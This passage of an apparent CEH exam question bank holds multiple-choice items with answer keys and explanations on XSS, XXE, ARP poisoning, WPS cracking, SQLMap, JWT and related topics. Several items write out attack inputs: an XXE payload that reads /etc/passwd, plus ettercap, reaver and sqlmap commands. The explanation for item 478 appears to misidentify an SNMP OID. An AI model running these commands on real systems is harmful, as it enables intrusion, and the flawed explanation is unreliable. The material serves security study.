C.Boot sector virus
D.Backdoor Trojan
AnswerD

A backdoor Trojan establishes a covert communication channel, granting an attacker persistent remote access and control over the compromised system. This persistent access necessitates regular, often low-volume, communication with a Command and Control (C2) server to receive commands, exfiltrate data, or update its status. The observed 'gradual increase in network traffic' is highly indicative of such C2 activity, as the attacker intermittently interacts with the backdoor over time, leading to a subtle but sustained rise in outbound or inbound connections.

Why this answer

The gradual increase in traffic to an external IP on port 443 (HTTPS) combined with connections to a known C2 domain indicates a backdoor Trojan. Backdoor Trojans establish stealthy, encrypted command-and-control channels to exfiltrate data or receive instructions, often mimicking legitimate HTTPS traffic to evade detection. This behavior aligns with a backdoor Trojan's purpose of providing unauthorized remote access while blending into normal network activity.

Exam trap

The trap here is that candidates may associate port 443 with legitimate web traffic and overlook the gradual, stealthy nature of the C2 communication, instead choosing ransomware or worm due to their more dramatic behaviors.

How to eliminate wrong answers

Option A is wrong because ransomware typically exhibits rapid, widespread file encryption and ransom note delivery, not a gradual increase in C2 traffic on port 443. Option B is wrong because a worm self-replicates across networks without requiring a C2 channel for remote control; its primary behavior is propagation, not sustained encrypted communication with an external server. Option C is wrong because a boot sector virus infects the Master Boot Record (MBR) and activates during system boot, not by generating network traffic to a C2 domain over HTTPS.

477
MCQeasy

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

A.Reflected XSS is a server-side vulnerability, while stored XSS is a client-side vulnerability
B.Reflected XSS is non-persistent and requires user interaction, while stored XSS is persistent and can affect multiple users
C.Reflected XSS only works with HTTP POST requests, while stored XSS works with GET requests
D.Reflected XSS is triggered by the server, while stored XSS is triggered by the client
AnswerB

This statement accurately describes the core differences. Reflected XSS is non-persistent because the malicious payload is delivered via a crafted URL or form submission and is immediately reflected in the server's response, requiring the victim to click a specific link. In contrast, Stored XSS is persistent; the malicious script is permanently saved on the target server (e.g., in a database) and is then served to any user who accesses the vulnerable web page, affecting multiple users without individual interaction beyond visiting the compromised page.

Why this answer

Reflected XSS is non-persistent: the malicious script is embedded in a request (often a URL parameter) and immediately reflected back in the response, requiring the victim to click a crafted link. Stored XSS is persistent: the payload is saved on the server (e.g., in a database, comment field, or forum post) and served to every user who views the affected page, affecting multiple victims without individual interaction.

Exam trap

CEH often tests the persistence and interaction distinction between reflected (non-persistent, needs a click) and stored (persistent, affects many users) XSS, while planting false distinctions about server-side vs client-side or GET vs POST to mislead candidates.

How to eliminate wrong answers

Option A is wrong because both reflected and stored XSS are fundamentally server-side output-encoding vulnerabilities — the server fails to sanitize/encode user input before rendering it; neither is a 'client-side vulnerability' in the sense implied. Option C is wrong because reflected XSS commonly works via GET (URL parameters) though it can also occur via POST, and stored XSS is independent of HTTP method — the method is not the distinguishing factor. Option D is wrong because both types are triggered when the victim's browser executes the injected script; the server reflects or stores the payload but the execution is client-side in both cases, so this distinction is false.

478
MCQmedium

An analyst observes the following SNMP walk output on a network device: `SNMPv2-SMI::enterprises.9.9.23.1.2.1.1.5.1 = STRING: "cisco"`. Which finding is most significant?

A.The SNMP community string is "cisco" and likely weak
B.The SNMP service is using version 2c
C.The device is running Cisco IOS version 12.0
D.The device is configured for read-write access
AnswerA

An SNMP walk often reveals the community string, especially if it's a default or commonly used value. The string "cisco" is a well-known default or weak community string, making it highly susceptible to discovery by attackers. Gaining access with such a string allows an attacker to perform extensive reconnaissance, retrieve sensitive device configuration, and potentially monitor network traffic. This represents a significant security vulnerability that should be remediated immediately.

Why this answer

The SNMP walk output reveals the community string 'cisco' in the OID `enterprises.9.9.23.1.2.1.1.5.1`, which corresponds to the SNMP community string (ciscoSnmpCommunityString) in Cisco's private MIB. A default or easily guessable community string like 'cisco' is a critical security weakness because it allows unauthorized read or read-write access to the device, enabling enumeration of system information or configuration changes. This finding is the most significant because it directly indicates a weak authentication mechanism that can be exploited for further enumeration or system compromise.

Exam trap

The trap here is that candidates often focus on the SNMP version or device model, but the most critical finding is the weak community string 'cisco', which is a direct authentication bypass vulnerability that enables enumeration and potential system compromise.

How to eliminate wrong answers

Option B is wrong because the SNMP walk output does not explicitly indicate the SNMP version; the OID prefix 'SNMPv2-SMI' refers to the SMI (Structure of Management Information) for SNMPv2, but the actual SNMP version used in the walk could be v1, v2c, or v3, and the presence of a community string suggests v1 or v2c, but this is not the most significant finding. Option C is wrong because the OID `enterprises.9.9.23.1.2.1.1.5.1` does not correspond to Cisco IOS version information; IOS version is typically found under OIDs like `1.3.6.1.2.1.1.1.0` (sysDescr) or `enterprises.9.9.23.1.2.1.1.1` (ciscoImageString), not the community string OID. Option D is wrong because the SNMP walk output only shows a read operation (walking the MIB tree) and does not indicate whether the community string provides read-write or read-only access; the string 'cisco' could be configured for either, but the walk itself does not confirm write capability.

479
MCQmedium

A company wants to secure its email communications using digital signatures. Which cryptographic key does the sender use to sign the email?

A.Sender's public key
B.Sender's private key
C.Recipient's private key
D.Recipient's public key
AnswerB

The sender's private key is the correct cryptographic component used to create a digital signature. This unique, secret key is applied to a hash of the email content, producing a signature that proves the sender's identity and ensures message integrity. Only the legitimate sender possesses this key, thereby providing non-repudiation and guaranteeing authenticity to the recipient.

Why this answer

Digital signatures use asymmetric cryptography where the sender signs the email with their private key. The recipient then verifies the signature using the sender's public key, ensuring authenticity and non-repudiation. This is defined in standards like S/MIME (RFC 5751) and OpenPGP (RFC 4880).

Exam trap

The trap here is that candidates confuse the roles of keys in encryption vs. signing, often selecting the sender's public key because they associate 'public' with sharing, but signing requires the private key to prove the sender's identity.

How to eliminate wrong answers

Option A is wrong because the sender's public key is used for verification by the recipient, not for signing; signing requires the private key to create a unique digital signature. Option C is wrong because the recipient's private key is used for decrypting messages encrypted with their public key, not for signing the sender's email. Option D is wrong because the recipient's public key is used for encrypting messages to the recipient, not for signing the sender's email.

480
MCQmedium

A security analyst observes repeated attempts to validate user accounts via SMTP using VRFY commands from an external IP. What is the BEST immediate action to mitigate this reconnaissance?

A.Upgrade to the latest version of the SMTP server
B.Enable SMTP authentication for all incoming connections
C.Block the external IP address at the firewall
D.Disable VRFY and EXPN commands in the SMTP server configuration
AnswerD

VRFY lets attackers enumerate valid mailboxes without authentication, so disabling VRFY and EXPN on the SMTP server removes the reconnaissance channel itself. This directly satisfies the stem's requirement for the best immediate mitigation, since the probing arrives over SMTP and no other control blocks that command set.

Why this answer

The VRFY command is an SMTP protocol feature (RFC 821) that allows a client to verify whether a specific email address exists on the server. Attackers use VRFY and EXPN to enumerate valid user accounts during the reconnaissance phase. Disabling these commands in the SMTP server configuration directly stops this enumeration technique without affecting legitimate mail delivery.

Exam trap

The trap here is that candidates often choose to block the IP address (Option C) as a quick fix, failing to recognize that the root cause is the enabled VRFY/EXPN commands, which must be disabled at the server configuration level for a permanent mitigation.

How to eliminate wrong answers

Option A is wrong because upgrading the SMTP server version does not disable VRFY/EXPN by default; the commands remain functional unless explicitly configured otherwise. Option B is wrong because SMTP authentication applies to mail submission (port 587) or after the initial connection, but VRFY is typically processed before authentication, so enabling auth does not block unauthenticated VRFY queries. Option C is wrong because blocking a single external IP is a temporary, reactive measure; the attacker can easily switch IPs, and the underlying vulnerability (enabled VRFY/EXPN) remains unaddressed.

481
MCQhard

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

A.XML External Entity (XXE) injection
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Command injection
AnswerA

XML External Entity (XXE) injection occurs when an XML parser processes a DOCTYPE declaration that defines an external entity, allowing the attacker to include content from external URIs or local files into the XML document. By defining an entity that points to a file path like `/etc/passwd`, the server's XML parser will attempt to resolve and embed the file's content within the XML response or process it internally. This vulnerability leverages the server's ability to fetch resources specified within the DTD, leading to information disclosure or even server-side request forgery.

Why this answer

The payload defines an external entity (xxe) that references the local file /etc/passwd and then uses it within the XML document. This is a classic XML External Entity (XXE) injection attack, where the attacker exploits weakly configured XML parsers to read local files or perform SSRF. The presence of <!DOCTYPE> with an ENTITY declaration and its usage in the root element confirms XXE.

Exam trap

CEH often tests the confusion between XXE and SSRF, as XXE can lead to SSRF, but the payload clearly shows an external entity definition, making XXE the primary vulnerability.

How to eliminate wrong answers

Option B is wrong because directory traversal typically involves manipulating file paths with ../ sequences to access files outside the web root, not XML entity definitions. Option C is wrong because SSRF involves making the server send requests to internal or external resources, which can be a consequence of XXE but is not the primary vulnerability shown here. Option D is wrong because command injection involves executing arbitrary OS commands, often through shell metacharacters, not through XML entity expansion.

482
MCQmedium

A penetration tester is conducting a vulnerability scan against a target network. Which of the following tools is BEST suited for this task?

A.Nessus
B.Nmap
C.Wireshark
D.Metasploit
AnswerA

Nessus is a leading commercial vulnerability scanner designed to identify security weaknesses across a wide range of systems and applications. It actively probes targets for misconfigurations, missing security patches, default credentials, and known vulnerabilities (CVEs) by comparing system responses against an extensive, frequently updated vulnerability database. Its comprehensive reporting capabilities provide actionable insights for remediation, making it an essential tool for proactive vulnerability management programs.

Why this answer

Nessus is a dedicated vulnerability scanner that automates the process of identifying known vulnerabilities, misconfigurations, and missing patches across a target network. It uses a large plugin database (e.g., NASL scripts) to perform non-intrusive checks against services and operating systems, making it the best tool for a vulnerability scan. Unlike general-purpose tools, Nessus is specifically designed to correlate scan results with CVE entries and provide risk ratings, which is the core requirement of a vulnerability assessment.

Exam trap

The trap here is that candidates confuse network scanning (Nmap) with vulnerability scanning (Nessus), assuming that any tool that discovers open ports can also assess vulnerabilities, but CEH distinguishes between reconnaissance tools and dedicated vulnerability assessment tools.

How to eliminate wrong answers

Option B (Nmap) is wrong because Nmap is a network mapper and port scanner, not a vulnerability scanner; while it can detect open ports and services via scripts (NSE), it lacks a comprehensive vulnerability database and automated plugin-based assessment. Option C (Wireshark) is wrong because Wireshark is a packet analyzer used for deep inspection of network traffic, not for scanning systems for vulnerabilities; it captures and dissects packets but does not perform active vulnerability checks. Option D (Metasploit) is wrong because Metasploit is an exploitation framework designed to verify and exploit vulnerabilities after they are identified, not to conduct a broad vulnerability scan; using it for scanning would be inefficient and potentially destructive without prior assessment.

483
MCQmedium

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

A.A boot sector virus
B.A backdoor Trojan
C.A fileless virus
D.A worm
AnswerB

A backdoor Trojan is designed to provide covert remote access to a compromised system, often establishing persistent communication channels with Command and Control (C2) servers. This communication frequently occurs over encrypted protocols like HTTPS to evade detection and blend with legitimate network traffic. The observed significant increase in outbound HTTPS traffic to multiple IP addresses is highly characteristic of a backdoor Trojan actively exfiltrating data, receiving commands, or updating its C2 infrastructure.

Why this answer

A backdoor Trojan is designed to give an attacker remote control over an infected system, often using outbound connections on common ports like 443 (HTTPS) to blend in with normal traffic. Since the server is not a web server and should not be initiating outbound HTTPS connections, this anomalous behavior strongly indicates a backdoor Trojan is exfiltrating data or receiving commands via encrypted channels.

Exam trap

The trap here is that candidates confuse a worm's network propagation behavior with a backdoor Trojan's command-and-control traffic, but the key differentiator is that the server is not a web server and the connections are outbound to multiple external IPs on a common encrypted port, which is classic C2 exfiltration, not self-replication.

How to eliminate wrong answers

Option A is wrong because a boot sector virus infects the Master Boot Record (MBR) and typically activates during system boot, not by generating outbound network traffic to external IPs. Option C is wrong because a fileless virus operates in memory (e.g., using PowerShell or WMI) and does not persistently create outbound connections on port 443; its primary trait is avoiding disk writes, not initiating stealthy command-and-control traffic. Option D is wrong because a worm self-replicates across networks using vulnerabilities or weak credentials, often causing widespread scanning or payload delivery, but its hallmark is propagation, not establishing a persistent backdoor for outbound data exfiltration on a single non-web server.

484
MCQhard

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

A.Nmap
B.tcpdump
C.Wireshark
D.Ettercap
AnswerD

Ettercap is a comprehensive suite for man-in-the-middle (MITM) attacks on LANs, specifically designed for ARP poisoning. It actively injects forged ARP replies into the network, tricking hosts into believing the attacker's MAC address is associated with the gateway's IP, and vice-versa. This redirection allows Ettercap to intercept, analyze, and even modify traffic between victims, making it a primary tool for detecting and executing ARP-based attacks.

Why this answer

Ettercap is a dedicated man-in-the-middle (MITM) attack tool that includes built-in ARP poisoning functionality. It sends forged ARP replies to associate the attacker's MAC address with the default gateway's IP, redirecting traffic through the attacker's host. This matches the described behavior of claiming the gateway's IP address via ARP replies.

Exam trap

The trap here is that candidates confuse passive monitoring tools (tcpdump, Wireshark) with active attack tools, or mistake Nmap's scanning capabilities for ARP spoofing, when only Ettercap is specifically designed for MITM via ARP poisoning.

How to eliminate wrong answers

Option A is wrong because Nmap is a network scanning and enumeration tool used for port discovery and service detection, not for generating forged ARP replies. Option B is wrong because tcpdump is a command-line packet capture utility that passively captures traffic; it cannot actively inject ARP replies. Option C is wrong because Wireshark is a graphical packet analyzer used for deep inspection of captured packets, not for crafting or sending malicious ARP packets.

485
MCQmedium

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored XSS
AnswerD

Stored Cross-Site Scripting (XSS), also known as Persistent XSS, occurs when a malicious script is permanently saved on the target server, typically within a database, message board, or comment section. When any user subsequently accesses the affected web page, the server retrieves and delivers the stored malicious payload along with the legitimate content. This script then executes automatically in the victim's browser, impacting all users who view the compromised data without requiring any specific interaction from them beyond page access.

Why this answer

The comment is stored on the server and executed when other users view the page, which is the definition of stored (persistent) XSS.

486
MCQeasy

Which of the following is a hashing algorithm that produces a 160-bit (20-byte) hash value?

A.MD5
B.SHA-256
C.SHA-1
D.SHA-512
AnswerC

SHA-1 (Secure Hash Algorithm 1) generates a 160-bit (20-byte) hash value, typically represented as a 40-character hexadecimal string. Historically, SHA-1 was a prevalent cryptographic hash function used for digital signatures and integrity verification, making it a common answer in questions about specific hash lengths. Despite its past widespread adoption, SHA-1 is now considered cryptographically insecure due to practical collision attacks and has been deprecated for most security-critical applications.

Why this answer

SHA-1 produces a 160-bit hash. MD5 produces 128 bits, SHA-256 produces 256 bits, and SHA-512 produces 512 bits.

487
MCQeasy

Which cryptographic algorithm is classified as symmetric and uses a block cipher with a fixed block size of 128 bits, supporting key sizes of 128, 192, and 256 bits?

A.RC4
B.3DES
C.AES
D.RSA
AnswerC

Advanced Encryption Standard (AES) is the correct answer because it is a symmetric block cipher that processes data in fixed-size blocks of 128 bits. AES supports various key sizes, including 128, 192, and 256 bits, providing strong security. Its design as a robust and efficient block cipher has established it as the global standard for symmetric encryption, fulfilling both the symmetric classification and the 128-bit block size requirement.

Why this answer

AES is a symmetric block cipher with a block size of 128 bits and supports key sizes of 128, 192, and 256 bits. It is the most widely used symmetric encryption standard.

488
MCQmedium

A security analyst captures a WPA2 4-way handshake using airodump-ng. To crack the PSK, which tool would they MOST likely use next?

A.Kismet
B.Aircrack-ng
C.John the Ripper
D.Reaver
AnswerB

Aircrack-ng is the definitive suite of tools for auditing wireless networks, specifically engineered for tasks like cracking WPA/WPA2-PSK keys. After capturing a complete 4-way handshake, the `aircrack-ng` component can efficiently perform dictionary attacks or brute-force attempts. It takes a wordlist and iteratively computes the Pairwise Master Key (PMK) for each candidate password, comparing the resulting Message Integrity Check (MIC) with the one contained within the captured handshake to validate the correct passphrase.

Why this answer

The correct tool for cracking a WPA2 PSK from a captured handshake is aircrack-ng, which performs dictionary attacks against the handshake file.

489
MCQhard

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

A.Out-of-band SQL injection
B.Blind SQL injection
C.Time-based SQL injection
D.In-band SQL injection
AnswerD

In-band SQL injection is SQLMap's default and preferred method because it allows the attacker to retrieve data directly through the same communication channel used for the original query. This category includes UNION-based attacks, which append a malicious SELECT statement to the original query to return additional data, and error-based attacks, which force the database to return error messages containing query results. These methods are generally the fastest and most efficient for data extraction when applicable, providing immediate feedback.

Why this answer

SQLMap's default enumeration technique is in-band (union/error-based) SQL injection, which extracts data through the same channel as the request — typically via UNION SELECT or error messages reflected in the HTTP response. With --dbs and no technique flag, SQLMap first attempts in-band methods before falling back to blind or time-based if those fail.

Exam trap

The trap is assuming SQLMap defaults to blind or time-based injection because those are 'safer' — in reality SQLMap prefers in-band (union/error) extraction and only falls back when necessary.

How to eliminate wrong answers

Option A is wrong because out-of-band SQL injection requires a separate channel (DNS or HTTP exfiltration to an attacker-controlled host) and must be explicitly enabled with --dns-domain or similar flags — it is never the default. Option B is wrong because blind SQL injection (boolean-based) is a fallback technique SQLMap uses only when in-band extraction is not possible, not the default. Option C is wrong because time-based SQL injection relies on deliberate delays (e.g., WAITFOR DELAY, SLEEP) and is also a fallback, not the default technique.

490
MCQeasy

Refer to the exhibit. A penetration tester runs the above Nmap scan. Which of the following statements is most accurate regarding the state of port 3389?

A.Port 3389 is open and running a Remote Desktop service, but the service version could not be identified.
B.Port 3389 is closed and the target is ignoring the probe.
C.The target is likely a honeypot designed to simulate a Windows machine.
D.A firewall is likely blocking the scan probes to port 3389, preventing Nmap from determining whether the port is open.
AnswerD

The 'filtered' state in Nmap output precisely indicates that Nmap was unable to ascertain whether a port is open or closed because its probes did not elicit a response. This condition commonly arises when a firewall or other packet filtering device is actively dropping or rejecting the scan packets directed at port 3389, thereby preventing Nmap from completing its state determination process. This is the most accurate interpretation of a 'filtered' port, signifying an unknown state due to network obstruction.

Why this answer

The Nmap scan output shows port 3389 in a 'filtered' state, which means Nmap received no response or an ICMP unreachable error from the target. This typically indicates a firewall is blocking the probes, preventing Nmap from determining whether the port is actually open or closed. A filtered state does not confirm the port is open or closed, only that access is being obstructed.

Exam trap

The trap here is that candidates confuse 'filtered' with 'closed' or 'open', failing to recognize that Nmap's port states (open, closed, filtered) have distinct meanings based on the type of response received, and that a firewall can cause a filtered state without revealing whether the service is actually running.

How to eliminate wrong answers

Option A is wrong because Nmap reports port 3389 as 'filtered', not 'open', so it cannot confirm the service is running or identify its version. Option B is wrong because a 'closed' port would return a TCP RST packet, not the lack of response or ICMP unreachable that defines the 'filtered' state. Option C is wrong because a honeypot would typically respond to probes to simulate a service, not remain silent or return ICMP unreachables; the 'filtered' state does not indicate deception, only network-level filtering.

491
MCQmedium

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

A.Wireshark
B.tcpdump
C.Ettercap
D.Nmap
AnswerC

Ettercap performs ARP poisoning to place the attacker between hosts, then relays traffic while capturing credentials and hijacking sessions, satisfying the stem's combined requirement for man-in-the-middle, sniffing and session hijacking. Its integrated plugin architecture handles all three natively, unlike single-purpose sniffers or poisoning utilities.

Why this answer

Ettercap is a comprehensive suite for man-in-the-middle attacks on LANs, featuring built-in ARP poisoning, session hijacking, and sniffing capabilities. It actively intercepts traffic by spoofing ARP replies to redirect packets through the attacker's machine, enabling real-time manipulation of sessions. This matches the question's description of a tool that performs ARP poisoning, MITM attacks, session hijacking, and sniffing.

Exam trap

The trap here is that candidates often confuse Wireshark's passive sniffing capability with active MITM functionality, forgetting that Wireshark cannot perform ARP poisoning or session hijacking on its own.

How to eliminate wrong answers

Option A is wrong because Wireshark is a passive network protocol analyzer that captures and inspects packets but does not perform active attacks like ARP poisoning or session hijacking. Option B is wrong because tcpdump is a command-line packet capture tool that only dumps traffic for offline analysis, lacking any active manipulation or MITM capabilities. Option D is wrong because Nmap is a network discovery and security scanning tool used for port scanning and OS detection, not for ARP poisoning, session hijacking, or sniffing in an active MITM context.

492
MCQmedium

A penetration tester is assigned to test a web application that uses a JSON Web Token (JWT) for session management. The tester captures the token and notices it is signed with the HS256 algorithm. After several attempts to crack the signing key offline, the tester modifies the token's payload to elevate privileges and changes the 'alg' header value to 'none'. When the modified token is sent to the server, the application accepts it and grants administrative access. Which vulnerability has the tester exploited?

A.JWT 'none' algorithm vulnerability
B.JWT algorithm confusion attack
C.JWT weak signing key
D.JWT token replay attack
AnswerA

The tester changed the 'alg' header to 'none' and the server accepted the token without a signature. This exploits a misconfiguration where the server trusts the 'alg' header and does not enforce a secure algorithm, allowing unsigned tokens. This is a specific JWT vulnerability often called the 'none' algorithm attack, which directly matches the scenario.

Why this answer

The scenario describes modifying the JWT header to set the algorithm to 'none' and removing the signature, which the server accepts. This is a classic 'none' algorithm vulnerability where the server does not enforce a secure signing algorithm. The other options describe different JWT issues that do not match the observed behavior of accepting an unsigned token.

Exam trap

The trap here is assuming that any JWT manipulation is an algorithm confusion attack, but the specific use of 'none' is a distinct flaw.

493
MCQeasy

A cloud security engineer wants to ensure that only authorized users can access an S3 bucket containing sensitive data. Which AWS service should be used to enforce fine-grained access control?

A.AWS Key Management Service (KMS)
B.AWS CloudTrail
C.AWS CloudFront
D.AWS Identity and Access Management (IAM)
AnswerD

AWS Identity and Access Management (IAM) is the core service for securely controlling access to AWS resources. It enables administrators to define granular permissions by creating users, groups, and roles, and attaching policies that specify which actions are allowed or denied on specific resources. IAM is fundamental for ensuring that only authorized entities can interact with AWS services and data, making it the correct solution for managing access control.

Why this answer

AWS Identity and Access Management (IAM) is the correct service because it allows the cloud security engineer to define fine-grained permissions using IAM policies that specify which users, groups, or roles can perform specific actions (e.g., s3:GetObject, s3:PutObject) on the S3 bucket. IAM integrates directly with S3 to enforce access control based on the principle of least privilege, ensuring only authorized users can access sensitive data.

Exam trap

The trap here is that candidates often confuse encryption services (KMS) or logging services (CloudTrail) with access control, but only IAM provides the fine-grained authorization policies needed to control user actions on S3 resources.

How to eliminate wrong answers

Option A is wrong because AWS Key Management Service (KMS) is used for encryption key management, not for enforcing access control policies; it protects data at rest but does not define who can access the bucket. Option B is wrong because AWS CloudTrail is a logging and monitoring service that records API calls for auditing, not a mechanism to enforce access control decisions. Option C is wrong because AWS CloudFront is a content delivery network (CDN) that can be used to distribute content with signed URLs or cookies, but it does not provide native fine-grained access control to the S3 bucket itself; it is a separate service for caching and delivery, not for authorization management.

494
MCQmedium

A security analyst notices a large number of incomplete TCP connections (SYN_RECV) on a server. Which Nmap scan type is the MOST likely cause of this symptom?

A.SYN scan (-sS)
B.Ping sweep (-sn)
C.TCP Connect scan (-sT)
D.UDP scan (-sU)
AnswerA

A SYN scan (-sS) sends TCP SYN packets and never completes the handshake, leaving connections in SYN_RECV on the target. Half-open scans abandoned at scale produce exactly this backlog, unlike connect scans, which finish the three-way handshake.

Why this answer

A SYN scan (-sS) sends a SYN packet to initiate a TCP handshake and, upon receiving a SYN/ACK, sends a RST to tear down the connection before it completes. This leaves the server with half-open connections in the SYN_RECV state because the three-way handshake is never finished. The large number of incomplete connections directly matches the behavior of a SYN scan.

Exam trap

The trap here is that candidates confuse SYN scan with TCP Connect scan, assuming both complete the handshake, but SYN scan deliberately avoids the final ACK to remain stealthy, leaving the connection half-open in SYN_RECV.

How to eliminate wrong answers

Option B (Ping sweep, -sn) is wrong because it only sends ICMP echo requests or TCP/UDP probes to determine if hosts are alive, not to establish TCP connections, so it cannot produce SYN_RECV states. Option C (TCP Connect scan, -sT) is wrong because it completes the full three-way handshake (SYN, SYN/ACK, ACK) and then sends a RST, leaving the connection in ESTABLISHED state only briefly, not in SYN_RECV. Option D (UDP scan, -sU) is wrong because UDP is connectionless and does not use SYN packets or maintain connection states like SYN_RECV.

495
MCQeasy

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

A.Vishing
B.Baiting
C.Phishing
D.Pretexting
AnswerD

Pretexting is a sophisticated social engineering attack where an attacker creates a believable, fabricated scenario, known as a 'pretext,' to manipulate a target into divulging sensitive information or performing a specific action. This often involves extensive research to build a convincing backstory and impersonate a legitimate individual or authority. The attacker maintains an interactive conversation, adapting the narrative to overcome skepticism and extract specific details, such as a password, under the guise of solving a problem or verifying identity.

Why this answer

Pretexting is a social engineering attack where the attacker fabricates a scenario (pretext) to manipulate the target into divulging sensitive information. In this case, the attacker impersonates IT support and invokes a fake server issue to create urgency, directly requesting the administrator's password. This aligns with the CEH definition of pretexting as a confidence-building deception, not a technical exploit.

Exam trap

The trap here is that candidates confuse the delivery method (phone call) with vishing, but the CEH exam distinguishes pretexting by the use of a fabricated scenario or false identity, regardless of the communication channel.

How to eliminate wrong answers

Option A is wrong because vishing (voice phishing) uses phone calls to trick victims into revealing information, but the core attack here is the fabricated story (pretext), not the medium; vishing is a subset of phishing, and the question's emphasis is on the false identity and scenario. Option B is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure the victim into a trap, not a direct request for credentials via a phone call. Option C is wrong because phishing typically uses electronic communication (email, SMS, or fake websites) to harvest credentials, not a live phone call with a constructed narrative; this is a voice-based pretexting scenario.

496
MCQmedium

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

A.To spoof the DNS responses to redirect the target to a malicious site
B.To sniff all traffic on the network by enabling promiscuous mode on the interface
C.To perform a denial-of-service attack by flooding the network with ARP replies
D.To perform a man-in-the-middle attack between the gateway and the target host
AnswerD

The `ettercap -M arp:remote` command is specifically designed to execute a man-in-the-middle (MITM) attack by poisoning the ARP caches of both the target host and the network gateway. By sending forged ARP replies, the attacker's machine convinces the target that it is the gateway, and convinces the gateway that it is the target. This redirection ensures all traffic flowing between the target and the internet passes through the attacker, enabling interception and potential manipulation.

Why this answer

The command `ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//` uses ARP poisoning in remote mode to intercept traffic between the gateway (192.168.1.1) and the target host (192.168.1.100). By sending forged ARP replies to both devices, the attacker's machine becomes a man-in-the-middle, allowing it to capture, modify, or relay packets between them. The `-M arp:remote` flag specifically enables ARP poisoning for a MITM attack, not for DNS spoofing, promiscuous mode, or flooding.

Exam trap

The trap here is that candidates confuse ARP poisoning with DNS spoofing or assume the command is for passive sniffing, but the `-M arp:remote` flag explicitly indicates an active MITM attack, not a passive or flooding technique.

How to eliminate wrong answers

Option A is wrong because DNS spoofing requires a separate plugin (e.g., `ettercap -T -M arp:remote -P dns_spoof`) and is not the primary purpose of the base ARP poisoning command. Option B is wrong because enabling promiscuous mode is a passive operation (e.g., `ifconfig eth0 promisc`), while this command actively sends forged ARP packets to manipulate traffic flow. Option C is wrong because a denial-of-service attack via ARP flooding would require a different tool or flag (e.g., `arping -f` or `macof`), and the `-M arp:remote` flag is designed for bidirectional interception, not network saturation.

497
MCQmedium

A security analyst runs `ldapsearch -x -h 10.0.0.3 -b "dc=company,dc=com"` and receives a large number of entries including user objects. What type of information is being collected?

A.SMB share listings
B.SNMP MIB values
C.NetBIOS names and MAC addresses
D.Active Directory users and attributes
AnswerD

The ldapsearch command is the primary utility for querying LDAP-compliant directories, including Microsoft Active Directory. The provided syntax ldapsearch -x -h 10.0.0.3 -b dc=co specifically targets an LDAP server at IP 10.0.0.3 for anonymous (simple) bind, searching within the base distinguished name dc=co. This operation is precisely how security analysts enumerate Active Directory users, groups, computers, and their associated attributes, making it the correct method for this task.

Why this answer

The `ldapsearch` command with the `-x` flag (simple authentication) and `-b` base DN `"dc=company,dc=com"` performs an LDAP query against the specified server (10.0.0.3). LDAP is the protocol used to query and retrieve directory services, and in a Windows environment, Active Directory exposes user objects, groups, and their attributes via LDAP. Therefore, the output contains Active Directory users and their associated attributes, making D correct.

Exam trap

The trap here is that candidates may confuse LDAP enumeration with other network discovery protocols (SMB, SNMP, NetBIOS) because all are used in the enumeration phase, but each uses distinct commands and ports—LDAP specifically targets directory services, not file shares or network device management.

How to eliminate wrong answers

Option A is wrong because SMB share listings are obtained using tools like `smbclient` or `enum4linux` with SMB protocol commands (e.g., `smbclient -L`), not via LDAP queries. Option B is wrong because SNMP MIB values are collected using SNMP tools like `snmpwalk` or `snmpenum` with community strings, not through LDAP. Option C is wrong because NetBIOS names and MAC addresses are gathered using `nbtstat` or `nbtscan` (NetBIOS over TCP/IP), not via LDAP directory queries.

498
MCQmedium

A penetration tester uses the following command to attack a WPS-enabled AP: 'reaver -i mon0 -b 00:11:22:33:44:55 -vv'. What is the primary goal of this attack?

A.Perform a de-authentication attack on all clients
B.Capture a WPA2 4-way handshake for offline cracking
C.Scan for hidden SSIDs in the area
D.Obtain the WPS PIN and subsequently the WPA2 PSK
AnswerD

Reaver is a dedicated tool for exploiting the Wi-Fi Protected Setup (WPS) vulnerability. It systematically brute-forces the 7-digit WPS PIN in two halves, significantly reducing the number of attempts required compared to a full 8-digit PIN. Once the correct WPS PIN is identified through this process, Reaver can then request and display the WPA2 Pre-Shared Key (PSK) directly from the access point, effectively compromising the network's security.

Why this answer

Reaver is used to brute force the WPS PIN, recovering the PIN and ultimately the WPA2 PSK.

499
MCQeasy

Which of the following is the primary purpose of using a CSRF token in a web application?

A.Prevent cross-site request forgery
B.Prevent session hijacking
C.Prevent XSS
D.Prevent SQL injection
AnswerA

Cross-Site Request Forgery (CSRF) attacks trick authenticated users into submitting unintended requests to a web application, leveraging their existing session. CSRF tokens are unique, unpredictable, and secret values generated by the server and embedded within forms or request headers. Upon submission, the server validates the token, ensuring the request originated from the legitimate application and user, thereby preventing an attacker's forged request from being processed.

Why this answer

CSRF tokens are unique, unpredictable values embedded in forms or requests that validate the request originated from the legitimate application, preventing cross-site request forgery attacks.

500
MCQmedium

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

A.Set 'AllowOverride None'
B.Set 'ServerSignature Off'
C.Set 'Options -Indexes' in the httpd.conf or .htaccess file
D.Set 'DirectoryIndex disabled'
AnswerC

